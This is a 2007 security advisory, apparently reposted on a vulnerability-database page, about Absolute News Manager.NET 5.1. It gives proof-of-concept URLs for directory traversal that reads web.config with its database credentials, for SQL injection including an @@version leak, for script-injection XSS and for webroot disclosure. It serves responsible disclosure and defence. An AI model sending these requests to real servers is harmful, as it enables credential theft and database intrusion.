Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection

2007.12.07

Credit: Adrian Pastor, Jan Fry and Richard Brain

Risk: High

Local: No

Remote: Yes

CVE: CVE-2007-6271

CWE: CWE-89

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection
Vulnerabilities found: 16 November 2007
Vendor informed: 19 November 2007
Vulnerability fixed: 28 November 2007
Severity: High
Description:
Multiple vulnerabilities were found on Absolute News Manager.NET 5.1:
- unauthenticated file retrieval (directory traversal) on '/pages/default.aspx'
- unauthenticated SQL injection on 'xlaabsolutenm.aspx' and possibly '/pages/default.aspx'
- XSS on 'xlaabsolutenm.aspx' and '/pages/default.aspx'
- webroot disclosure on 'getpath.aspx'
File retrieval PoC:
The following URL shows the contents of .NET 'web.config' (contains DB credentials):
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=.
./web.config
The following URL show contents of the vulnerable script:
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=d
efault.aspx%00
Note: in order to obtain the content of '.aspx' files, a null byte '%00' must be added after the filename.
Show content of other scripts:
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../anmviewer.
ascx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../default.as
px%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../PPL1Histor
yTicker.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlagc.ascx
%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlaabsolut
enm.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../streamconf
ig.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.
aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../articlefil
es/r.asp%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.
aspx%00
SQL injection PoCs:
Vulnerable script: /[CustomerDefinedDir]/xlaabsolutenm.aspx
Vulnerable parameters: z, pz, ord, sort
Requesting the following URL returns the version of Windows and SQL server:
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz
=9&featured=n&ord=desc&sort=posted&rmore=-&
System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
Other URLs:
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&s
ort=headline'INJECTED_PAYLOAD&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'I
NJECTED_PAYLOAD&sort=headline&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_
PAYLOAD&ord=asc&sort=headline&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_
PAYLOAD&ss=y&size=1.1em&target=iframe&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=
asc&sort=headline'INJECTED_PAYLOAD&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=
asc'INJECTED_PAYLOAD&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJE
CTED_PAYLOAD&ord=asc&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_P
AYLOAD&pz=21&ord=asc&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&s
ort=posted'INJECTED_PAYLOAD&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'I
NJECTED_PAYLOAD&sort=posted&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJEC
TED_PAYLOAD&featured=only&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featu
red=n&ord=desc&sort=posted'INJECTED_PAYLOAD&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featu
red=n&ord=desc'INJECTED_PAYLOAD&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJEC
TED_PAYLOAD&featured=n&ord=desc&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_P
AYLOAD&ord=desc&sort=posted&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_P
AYLOAD&pz=8&featured=only&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_P
AYLOAD&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&s
ort=posted'INJECTED_PAYLOAD&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'I
NJECTED_PAYLOAD&sort=posted&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_P
AYLOAD&ord=desc&sort=posted&
The script '/pages/default.aspx' might also be vulnerable to SQL injection but it has not been confirmed.
Requesting the following URLs:
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=40&z=9999999
999999
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=999999999999
9&z=1
return the following error:
System.Data.SqlClient.SqlException: Error converting data type nvarchar to int.
XSS PoCs:
Vulnerable script: '/xlaabsolutenm.aspx'
Unsanitized parameter: 'rmore'
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=1,7&sort=art
icleID&ord=desc&rmore=%3Cscript%3Ealert(1)%3C/script%3E&size=2&h=abc&isf
rame=y
Vulnerable script: '/pages/default.aspx'
Unsanitized parameter: 'template'
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=%3Cscript%3Ea
lert(2)%3C/script%3E
Webroot PoC:
Requesting the 'getpath.aspx' demo script discloses the physical path of the webroot - ie:
http://target.tld/[CustomerDefinedDir]/getpath.aspx
"
Absolute News Manager Physical Path :
D:\inetpub\target.tld\[CustomerDefinedDir]
Please delete this file from your installation.
"
Consequences:
Contents of any files on the web server can be obtained. Unauthorized SQL queries can be injected. Scripting code can be run within the security context of the target domain. Information about the target environment can be extracted.
Fix:
http://www.xigla.com/security/
http://www.xigla.com/security/ANMNET51-SecurityUpdate20071128.zip
Note: ProCheckUp has NOT tested the patch provided by Xigla Software.
References:
http://www.procheckup.com/Vulnerability_2007.php
http://www.xigla.com/absolutenmnet/
Credits: Adrian Pastor, Jan Fry and Richard Brain of ProCheckUp Ltd (www.procheckup.com)
ProCheckUp thanks Xigla Software for working with us.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.